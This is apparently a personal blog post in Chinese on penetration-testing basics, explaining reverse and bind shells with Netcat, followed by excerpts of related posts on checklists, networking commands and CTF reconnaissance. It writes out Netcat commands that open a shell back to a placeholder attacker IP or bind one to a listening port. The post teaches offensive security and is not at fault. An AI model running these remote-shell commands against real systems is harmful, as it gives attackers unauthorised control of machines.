shells

发表于2025-05-20|更新于2026-06-10|Network Security

|浏览量:

反向 Shell 与绑定 Shell

Shell 只是获取和维护对目标计算机的访问权限的一种方式。最常见的 shell 类型是反向 shell，其中受害计算机连接回我们。用于完成 rev-shell 的常用工具是 Netcat。

Rev 贝壳

为了使 rev shell 工作，攻击设备需要侦听特定端口上的连接。在 Netcat 中，我们可以使用以下命令告诉设备监听选定的端口：nc -lvp 4444。

-l 用于监听
-v 表示详细
-p 用于端口
通过此命令，我们告诉 Netcat 监听我们机器的端口 4444。

在目标上：

为了让目标连接到我们的监听器，我们必须在目标上发送执行命令来建立连接。例如：如果目标安装了netcat（或者我们有一些如何将netcat安装到目标机器上），我们可以使用它来连接回我们的机器。

在这种情况下，目标上的命令将如下所示：

1	nc <attacking IP> 4444 -e /bin/sh

在此命令中，目标设备上的 nc 创建一个返回攻击 IP 的 TCP 连接，并使用 -e 标志执行 shell (/bin/bash)（该 shell 在目标设备上执行）。

绑定外壳

绑定 shell 本质上是rev shell 的反向操作。在绑定 shell 中，我们在目标上打开一个端口进行侦听，并从攻击者处建立到该地址的 TCP 连接。

shell 执行仍然来自目标设备：

# Attacking command (example)
nc <target IP> 4444
# Target command (ex)
nc -lvp 4444 -b /bin/bash

绑定 shell 在外部笔测试期间更常用，因为它更容易连接到目标（由于防火墙和其他使外部网络访问复杂化的因素）。

[！我以前的笔记（在文本中链接）]

Rev Shell

Netcat

TCP

绑定 Shell

空白

文章作者: xhj

文章链接: https://hzhzxfs.github.io/2025/05/20/shells/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 xhj的博客！

Network Security

相关推荐

外部参与清单检查表对于任何类型的参与都很有用。外部渗透测试清单基本外部渗透测试清单的示例可能包括：确保 ROE 已由客户签署将范围内的 IP 添加到范围选项卡验证客户范围发送“启动”电子邮件进行漏洞扫描在违规数据库中识别员工的电子邮件/凭证 ID员工电子邮件格式 ID 客户的网站枚举门户上的所有帐户、密码重置功能等。扫描网络应用程序（如果存在）进行手动测试和利用验证扫描时发现的漏洞在登录端点/门户上进行密码喷射等将访问从外部升级到内部验证之前的发现已得到解决（如果适用）清理每个项目都应该有一个地方可以添加注释和状态（即待处理、已完成等）。您还可以检查范围内的交战规则/资产部分。例如，如果范围内有 10 个 IP 地址，请为每个地址制作一个清单，您可以在其中添加注释并在调查它们时进行标记。将所有这些内容分组到具有多个选项卡的电子表格中会有所帮助。 [!资源] TCM安全 [！我以前的笔记（在文本中链接）] 你可以在这里找到它们

OSI 参考模型一种网络表示形式，用于将数据必须经过的不同协议和封装层结合起来，才能通过网络从一个设备传输到另一个设备。肺炎：######请做不投掷香肠披萨离开L1：身体（请）处理沿物理介质的电信号传输。涉及以太网/CAT-5 等数据电缆。 L2：数据链路 (do)处理来自第 1 层的电消息的[复用和解复用](/networking/OSI/ Multiplexing.md)。这是最复杂的层，因为它抽象了将电信号转换为有意义的数据的工作。它还分为 2 个子层，即“逻辑链路控制”和“媒体访问控制”层。使用 MAC 地址来识别设备以及交换机以在它们之间路由流量。该层中的数据被封装到帧和来自帧的数据。 L3：网络（不是）网络层负责从使用 IP 地址进行寻址的设备传输数据（封装到数据包中），并使用路由器等 L3 设备进行路由。 L4：传输（抛出）使用 TCP 和 UDP 协议处理网络通信。 L5：会话（香肠）负责创建和维护彼此发送和接收数据的两方之间的连接。一旦建立连接，就会创建会话。每个会话对其连接来说都是唯一的，这意味着数据不应该能...

network-commands

Linux 网络命令The ip and ifconfig commands are similar. They list and configure current network interfaces on the device. ifconfig is the older of the two and may not be present on all machines. 使用 ip a 将列出无线和硬连线/以太网连接，而 ifconfig 将仅列出以太网。另一个可用于列出无线连接的命令是 iwconfig。 ARP（地址解析协议）地址解析协议是第 3 层(/networking/OSI/network-layer.md) 协议，可帮助主机将 IP 地址解析为关联设备的 MAC 地址。 arp -a 和 ip n （n 代表 neighbor）命令可在 Linux 中使用来列出与网络中本地 IP 地址关联的 MAC 地址。您还可以使用带有 -r 标志的 netdiscover 来执行实时 ARP 数据包捕获： 123456sudo...

蓝色演练将这些框视为 CTF（实际上不是笔测试）。侦察我们的第一次 nmap 扫描为我们提供了一些端口和一些操作系统版本控制： 1234567891011121314151617181920212223nmap -Pn $t Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-04 13:59 EDT Nmap scan report for 10.0.2.6 Host is up (0.00077s latency). Not shown: 991 closed tcp ports (conn-refused) PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp o...

Linux sudo 命令sudo 代表“超级用户执行”，允许您以 root 用户身份运行命令。权限提升仅在运行命令时存在。某些发行版（例如 Ubuntu）会将超级用户权限保留 15 分钟。 “sudoers”组中的用户拥有超级用户权限。根用户：Linux 发行版中“sudoers”组中的默认用户的一个示例是 root 用户。要以 root 用户身份登录，请使用 sudo su - 并且 shell 的上下文将更改为您作为 root 用户。退出或终止当前 shell 将终止该 shell 的 root 用户权限。

researching-vulns

研究潜在的漏洞根据我们在 Kioptrix 的扫描和枚举中发现的内容，我们需要研究我们可能已识别的漏洞。研究结果按我们认为最容易被利用和/或最容易受到攻击的顺序排列： 123456789101112131415161718192021222324252627Target: 10.0.3.5Ports w/ findings: 80: HTTP :80/ Default page for Apache Web Server: Apache v1.3.20 (Unix) (Red-Hat/Linux) mod_ssl v2.8.4 :80/manual/* manual pages for Apache HTTP Server Version 1.3b5 :80/manual/mod/mod_ssl/* manual pages for mod_ssl v2.8.31 443: HTTPS Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl v2.8.4 OpenSSL v0.9.6...